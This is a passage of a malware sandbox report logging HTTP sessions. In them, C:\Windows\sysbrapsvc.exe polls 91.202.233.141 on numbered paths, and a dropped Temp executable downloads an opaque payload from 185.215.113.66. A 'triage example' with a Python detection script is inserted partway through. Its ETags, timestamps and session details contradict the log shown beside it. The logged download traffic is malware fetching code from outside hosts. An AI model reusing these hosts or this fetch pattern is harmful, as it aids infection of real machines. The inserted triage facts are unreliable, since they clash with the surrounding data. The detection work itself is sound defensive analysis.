                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:43.548258066 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:43 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              54         | 192.168.2.8 | 49796       | 91.202.233.141 | 80               | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:45.926543951 CEST | 166 | OUT | GET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:46.277040005 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:46 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              55         | 192.168.2.8 | 49797       | 91.202.233.141 | 80               | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:48.666867971 CEST | 166 | OUT | GET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:49.024565935 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:48 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
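                                                                              Added triage example for this page; it is not part of the Joe Sandbox report and not code from the sample. The sessions above show two processes, C:\Windows\sysbrapsvc.exe (PID 5588, Chrome/124 User-Agent) and the dropped C:\Users\user\AppData\Local\Temp\1146722911.exe (PID 2060, Chrome/121 User-Agent), requesting short numbered paths (/6, /_1 to /_3, /1 to /3) from bare-IP hosts over plain HTTP on port 80. 185.215.113.66 answers with application/octet-stream bodies that do not start with the MZ stub of a PE file (the first bytes shown are 4e 47 53 21 and 4d 69 d1 66), while 91.202.233.141 answers 404 for every slot. The script below replays those exchanges from records constructed from the page, flags the bare-IP numbered-path pattern per process and host, checks whether each served body is a raw PE, and decodes the nginx ETags: a stock nginx builds the ETag of a file served from disk as hex(mtime)-hex(size), so "663a7354-2408" and "6636358e-2d00" decode to 7 May 2024 18:30:44 GMT / 9224 bytes and 4 May 2024 13:18:06 GMT / 11520 bytes, which match the Last-Modified and Content-Length headers and date when each payload was staged on the server. Function names, the Exchange record layout and the detection rule are assumptions made for this example.

```python
"""Triage helpers for HTTP sessions like the ones in this report.

Added example for this page, not code from the Joe Sandbox report or from the
sample. SESSIONS and RESPONSE_HEADERS are constructed from the exchanges shown
above; helper names and the detection rule are assumptions.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from ipaddress import ip_address

# nginx's default ETag for a file served from disk is "<hex mtime>-<hex size>".
NGINX_ETAG_RE = re.compile(r'^"?([0-9a-f]+)-([0-9a-f]+)"?$')
# Resource slots requested above: /6, /_1 ... /_3, /1 ... /3.
NUMBERED_PATH_RE = re.compile(r"^/_?\d+$")


@dataclass(frozen=True)
class Exchange:
    process: str
    host: str           # Host header value
    path: str
    status: int
    content_type: str
    body_prefix: bytes  # first bytes of the response body


SYSBRAPSVC = r"C:\Windows\sysbrapsvc.exe"
TEMP_EXE = r"C:\Users\user\AppData\Local\Temp\1146722911.exe"
HTML_404 = b"<html>\r\n<head><title>404 Not Found</title>"

# Constructed from sessions 51 to 55 above (body prefix = first bytes shown).
SESSIONS = [
    Exchange(SYSBRAPSVC, "185.215.113.66", "/6", 200, "application/octet-stream",
             bytes.fromhex("4d69d166af90caef")),
    Exchange(TEMP_EXE, "91.202.233.141", "/_1", 404, "text/html", HTML_404),
    Exchange(TEMP_EXE, "91.202.233.141", "/_2", 404, "text/html", HTML_404),
    Exchange(TEMP_EXE, "91.202.233.141", "/_3", 404, "text/html", HTML_404),
    Exchange(SYSBRAPSVC, "91.202.233.141", "/1", 404, "text/html", HTML_404),
    Exchange(SYSBRAPSVC, "91.202.233.141", "/2", 404, "text/html", HTML_404),
    Exchange(SYSBRAPSVC, "91.202.233.141", "/3", 404, "text/html", HTML_404),
]

# (ETag, Content-Length, Last-Modified) of the two 200 responses above.
RESPONSE_HEADERS = [
    ('"663a7354-2408"', 9224, "Tue, 07 May 2024 18:30:44 GMT"),
    ('"6636358e-2d00"', 11520, "Sat, 04 May 2024 13:18:06 GMT"),
]


def parse_nginx_etag(etag: str) -> tuple[datetime, int]:
    """Decode an nginx ETag into (file mtime as UTC datetime, file size)."""
    m = NGINX_ETAG_RE.match(etag.strip())
    if not m:
        raise ValueError(f"not an nginx-style ETag: {etag!r}")
    mtime = datetime.fromtimestamp(int(m.group(1), 16), tz=timezone.utc)
    return mtime, int(m.group(2), 16)


def etag_matches_headers(etag: str, content_length: int, last_modified: str) -> bool:
    """True when the ETag agrees with Content-Length and Last-Modified, i.e.
    a stock nginx served the file from disk and the mtime is the staging time."""
    mtime, size = parse_nginx_etag(etag)
    return size == content_length and mtime == parsedate_to_datetime(last_modified)


def is_pe_image(body_prefix: bytes) -> bool:
    """True when the body starts with the 'MZ' DOS stub of a PE file."""
    return body_prefix[:2] == b"MZ"


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def flag_numbered_fetches(exchanges: list[Exchange]) -> list[dict]:
    """Group requests by (process, host) and report bare-IP hosts polled with
    numbered paths: how many slots returned an opaque (non-PE) octet-stream
    body and how many returned 404."""
    groups = defaultdict(list)
    for ex in exchanges:
        if is_bare_ip(ex.host) and NUMBERED_PATH_RE.match(ex.path):
            groups[(ex.process, ex.host)].append(ex)
    findings = []
    for (process, host), exs in groups.items():
        opaque = [e for e in exs if e.status == 200
                  and e.content_type == "application/octet-stream"
                  and not is_pe_image(e.body_prefix)]
        findings.append({"process": process, "host": host,
                         "paths": [e.path for e in exs],
                         "opaque_payloads": len(opaque),
                         "not_found": sum(e.status == 404 for e in exs)})
    return findings


if __name__ == "__main__":
    for etag, length, modified in RESPONSE_HEADERS:
        mtime, size = parse_nginx_etag(etag)
        print(f"{etag}: staged {mtime:%Y-%m-%d %H:%M:%S} UTC, {size} bytes, "
              f"consistent={etag_matches_headers(etag, length, modified)}")
    for finding in flag_numbered_fetches(SESSIONS):
        print(finding)
```

Run it as a script to print the staging times and one finding per (process, host) pair. The ETag check is only meaningful for the nginx default format; a proxy, a custom handler or a forged header breaks the agreement, which is itself worth noting during triage. Treating a non-MZ octet-stream body as opaque says nothing about its encoding; it only tells you the file on the wire is not the executable that later runs, so the decoding step lives in the downloader.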


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              56         | 192.168.2.8 | 49800       | 91.202.233.141 | 80               | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:51.563631058 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:51.909209013 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:51 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID: 57
                                                                              Source IP: 192.168.2.8   Source Port: 49801   Destination IP: 91.202.233.141   Destination Port: 80   PID: 5588   Process: C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:54.290774107 CEST | 166 | OUT | GET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:54.642417908 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID: 58
                                                                              Source IP: 192.168.2.8   Source Port: 49802   Destination IP: 91.202.233.141   Destination Port: 80   PID: 5588   Process: C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:25:57.027489901 CEST | 166 | OUT | GET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:57.380295992 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID: 59
                                                                              Source IP: 192.168.2.8   Source Port: 49807   Destination IP: 185.215.113.66   Destination Port: 80   PID: 2060   Process: C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:26:10.156857967 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:26:10.497107029 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:26:10 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:26:10.497241974 CEST | 1289 | IN | Data Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:26:10.497333050 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:26:10.497349024 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:26:10.497562885 CEST | 1289 | IN | Data Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:26:10.497608900 CEST | 1289 | IN | Data Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:26:10.498331070 CEST | 1289 | IN | Data Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
